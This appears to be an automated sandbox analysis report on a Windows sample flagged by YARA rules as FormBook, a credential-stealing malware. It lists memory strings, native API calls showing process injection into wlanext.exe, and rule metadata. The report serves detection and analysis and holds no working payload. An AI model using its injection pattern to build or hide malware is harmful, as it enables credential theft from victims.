Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.675439784.000000000B976000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: wlanext.exe, 00000007.00000002.908237231.0000000003E92000.00000004.00000001.sdmp, String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lande
Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.1cec9342_by_Libranalysis.exe.2340000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.1cec9342_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_0041826C NtReadFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_004182EA NtClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A5B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A599D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59A10 NtQuerySection,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A5A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A5AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59560 NtWriteFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A596D0 NtCreateKey,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A5A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59760 NtOpenProcess,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A59770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A5A770 NtOpenThread,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_004182F0 NtClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_004181BA NtCreateFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_0041826C NtReadFile,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_004182EA NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038496D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038495D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0384A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038499D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038498A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038498F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0384B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038497A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0384A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0384A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038495F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0384AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03849560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_010481C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_010483A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_01048270 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_010482F0 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_010481BA NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0104826C NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_010482EA NtClose,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 0_2_00406945
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 0_2_0040711C
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00408C5B
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00408C60
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_0041C538
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00402D89
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_0041C7A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A420A0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE20A8
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A2B090
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE28EC
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AD1002
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A34120
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A1F900
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE22AE
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A4EBB0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00ADDBD2
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE2B28
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A2841F
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00ADD466
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A42581
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A2D5E0
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE25DD
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A10D20
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE2D07
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE1D55
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE2EF7
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00A36E30
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_2_00AE1FF1
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: 1_1_00401030
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0383EBB0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038CDBD2
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038D2B28
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038D22AE
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0380F900
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03824120
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0381B090
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038320A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038D20A8
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038D28EC
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038C1002
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038DE824
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038D1FF1
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038D2EF7
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038CD616
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03826E30
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03832581
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038D25DD
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0381D5E0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038D2D07
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_03800D20
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038D1D55
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0381841F
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_038CD466
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0104C538
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_01032D89
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_01032D90
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_01038C5B
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_01038C60
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_0104C7A0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 7_2_01032FB0
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0380B150 appears 35 times
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: String function: 00A1B150 appears 35 times
          Source: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe | Code function: String function: 0041A0A0 appears 38 times
          Source: 1cec9342_by_Libranalysis.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 1cec9342_by_Libranalysis.exe, 00000000.00000003.645430584.000000001EEAF000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693898854.0000000000C9F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exe, 00000001.00000002.693999734.0000000000D72000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamewlanext.exej% vs 1cec9342_by_Libranalysis.exe
          Source: 1cec9342_by_Libranalysis.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
